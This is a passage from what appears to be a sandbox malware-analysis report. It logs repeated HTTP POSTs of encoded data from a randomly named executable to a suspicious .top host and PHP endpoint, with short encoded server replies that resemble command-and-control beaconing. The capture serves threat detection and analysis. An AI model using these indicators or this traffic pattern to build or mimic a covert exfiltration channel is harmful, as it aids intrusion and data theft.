                                                          Data Ascii: [P\TZ_^X\ZQVW^WUP[^_TXSATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/![)9(4Y*#_'/);R0)7Z".=X(@3X''79#G X/5
                                                          Sep 8, 2024 11:53:15.004048109 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:15.212975979 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:14 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          83192.168.2.46477380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:15.340979099 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:15.697124958 CEST2532OUTData Raw: 5b 51 59 53 5a 5f 5b 5b 5c 5a 51 56 57 5d 57 51 50 58 5e 58 54 5d 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [QYSZ_[[\ZQVW]WQPX^XT]SBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%],2)973,>3X3)/S$:7_#-=+;^0Q \:;#G X/9
                                                          Sep 8, 2024 11:53:16.008153915 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:16.136841059 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          84192.168.2.46477480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:16.261452913 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:16.618973970 CEST2532OUTData Raw: 5b 5a 5c 51 5a 5e 5b 51 5c 5a 51 56 57 5f 57 52 50 5e 5e 59 54 5a 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Z\QZ^[Q\ZQVW_WRP^^YTZSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/2-^=*?70Y>?0$8V%98".(6$7-+#G X/1
                                                          Sep 8, 2024 11:53:16.955614090 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:17.088589907 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          85192.168.2.46477580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:17.215267897 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          86192.168.2.46477680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:17.312753916 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:17.665837049 CEST1412OUTData Raw: 5b 59 5c 51 5f 58 5b 5d 5c 5a 51 56 57 5d 57 55 50 50 5e 5f 54 5e 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Y\Q_X[]\ZQVW]WUPP^_T^SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&8)\)(7')?($; %9#>?&?_3;.;#G X/9
                                                          Sep 8, 2024 11:53:17.976325989 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:18.104505062 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 25 0a 30 3f 39 58 35 2e 28 0b 3d 01 3d 56 2d 03 09 02 28 3a 2d 44 3d 20 20 1e 2a 2f 36 1d 3d 5d 36 1d 3d 3f 38 5f 34 08 27 11 31 1f 28 5e 03 11 23 11 36 3e 3d 06 3e 07 3d 03 3d 08 3c 14 29 06 20 03 23 37 3f 0d 23 15 06 5a 23 28 0c 50 3c 3a 22 50 2d 34 25 40 39 1d 2d 0d 36 34 2d 57 0c 12 20 50 3f 58 2b 53 20 1d 21 5d 26 3e 3d 5d 24 08 29 01 29 38 39 09 3f 38 0f 04 26 54 28 09 24 2d 29 5b 29 38 3d 00 27 00 2c 01 22 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: %0?9X5.(==V-(:-D= */6=]6=?8_4'1(^#6>=>==<) #7?#Z#(P<:"P-4%@9-64-W P?X+S !]&>=]$))89?8&T($-)[)8=',"-$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          87192.168.2.46477780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:17.434405088 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:17.790874958 CEST2532OUTData Raw: 5b 5a 59 51 5a 5c 5b 5f 5c 5a 51 56 57 5f 57 53 50 50 5e 5c 54 5b 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [ZYQZ\[_\ZQVW_WSPP^\T[S@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&8-_)9 #,])($9_,$$#5)X<07#.#G X/1
                                                          Sep 8, 2024 11:53:18.115796089 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:18.393701077 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          88192.168.2.46477880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:18.527678013 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:18.884573936 CEST2532OUTData Raw: 5b 5c 5c 55 5a 5a 5b 5b 5c 5a 51 56 57 5e 57 56 50 51 5e 5d 54 5a 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [\\UZZ[[\ZQVW^WVPQ^]TZSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,>9/]4 (<73/4';Z"-1[)&(0<]-+#G X/5
                                                          Sep 8, 2024 11:53:19.219105005 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:19.425755978 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:18 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          89192.168.2.46477980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:19.558459997 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:19.915808916 CEST2528OUTData Raw: 5b 5d 5c 52 5a 5e 5e 58 5c 5a 51 56 57 5b 57 56 50 5f 5e 5c 54 5c 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []\RZ^^X\ZQVW[WVP_^\T\SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%]/"-\?)4 <*?7_39Z,<$*#Y#=6)6($7(\9;#G X/-
                                                          Sep 8, 2024 11:53:20.227173090 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:20.435189009 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:19 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          90192.168.2.46478080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:20.562295914 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:20.915920973 CEST2532OUTData Raw: 5e 59 5c 5e 5f 58 5e 5c 5c 5a 51 56 57 5e 57 53 50 5d 5e 5c 54 54 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^Y\^_X^\\ZQVW^WSP]^\TTSHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,)_>97 )<$/=[;'^"=1X(6,&'':+#G X/5
                                                          Sep 8, 2024 11:53:21.254877090 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:21.390332937 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:20 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          91192.168.2.46478180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:21.514278889 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:21.869141102 CEST2528OUTData Raw: 5e 5d 5c 53 5f 58 5e 5f 5c 5a 51 56 57 5b 57 56 50 5a 5e 5d 54 5d 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]\S_X^_\ZQVW[WVPZ^]T]SHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/!\):?#?)?,%?)_,$)Y#>(%,0Q -+#G X/-
                                                          Sep 8, 2024 11:53:22.181226969 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:22.308634996 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          92192.168.2.46478280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:22.433754921 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:22.790874004 CEST2532OUTData Raw: 5e 5d 5c 55 5a 58 5e 5f 5c 5a 51 56 57 5a 57 5d 50 5a 5e 5c 54 5e 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]\UZX^_\ZQVWZW]PZ^\T^SHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_;!%>8! /*3]8<39!>6<% $'#-#G X/%
                                                          Sep 8, 2024 11:53:23.105921030 CEST25INHTTP/1.1 100 Continue


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          93192.168.2.46478380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:23.125055075 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:23.478318930 CEST1412OUTData Raw: 5b 51 5c 51 5a 5d 5b 5c 5c 5a 51 56 57 59 57 50 50 5a 5e 5d 54 55 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Q\QZ][\\ZQVWYWPPZ^]TUSBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/=>*'40$>?7$<5[/'#S$94")Y?#^''\9#G X/)
                                                          Sep 8, 2024 11:53:23.799460888 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:24.004053116 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:23 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 1e 24 11 0b 5d 22 2d 3b 54 29 01 03 50 2c 2d 23 01 3e 39 0c 1b 28 20 27 0b 3e 3c 29 02 29 15 21 45 2a 2c 3f 01 37 0f 2f 59 31 1f 28 5e 03 11 20 03 36 2d 3e 5e 3d 07 25 03 28 21 23 00 3e 11 0e 05 22 1d 2c 56 21 2b 28 12 23 28 36 50 3c 07 22 1c 3b 1a 2a 1c 2e 1d 2e 12 21 34 2d 57 0c 12 20 51 3c 3d 37 56 34 30 29 5c 32 07 39 10 25 35 39 02 3d 3b 31 08 2b 38 29 01 26 54 3c 0f 24 5b 2d 12 2a 01 26 14 30 39 34 04 36 07 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &$]"-;T)P,-#>9( '><))!E*,?7/Y1(^ 6->^=%(!#>",V!+(#(6P<";*..!4-W Q<=7V40)\29%59=;1+8)&T<$[-*&0946$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          94192.168.2.46478480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:23.260252953 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:23.618938923 CEST2532OUTData Raw: 5e 5a 59 56 5f 5e 5b 5e 5c 5a 51 56 57 5d 57 55 50 5d 5e 58 54 5d 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^ZYV_^[^\ZQVW]WUP]^XT]SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/\?:7X#?(<+\'?1Z84$$(#.!^<6804.+#G X/9
                                                          Sep 8, 2024 11:53:23.928229094 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:24.131973982 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:23 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          95192.168.2.46478580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:24.263524055 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:24.619117022 CEST2532OUTData Raw: 5b 5e 5c 5f 5f 5d 5b 51 5c 5a 51 56 57 5c 57 53 50 50 5e 5f 54 5b 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [^\__][Q\ZQVW\WSPP^_T[SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\;[=9;]70<\(,0/",<3#.?'X'Q _:+#G X/
                                                          Sep 8, 2024 11:53:24.944761038 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:25.076587915 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:24 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          96192.168.2.46478680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:25.202526093 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:25.556559086 CEST2532OUTData Raw: 5e 5a 59 51 5f 5a 5e 5d 5c 5a 51 56 57 53 57 51 50 50 5e 5c 54 5d 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^ZYQ_Z^]\ZQVWSWQPP^\T]SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%Z/!-)9 00[(/<'<>,4'$("=!?$34 \:+#G X/
                                                          Sep 8, 2024 11:53:25.866633892 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:25.996840954 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:25 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
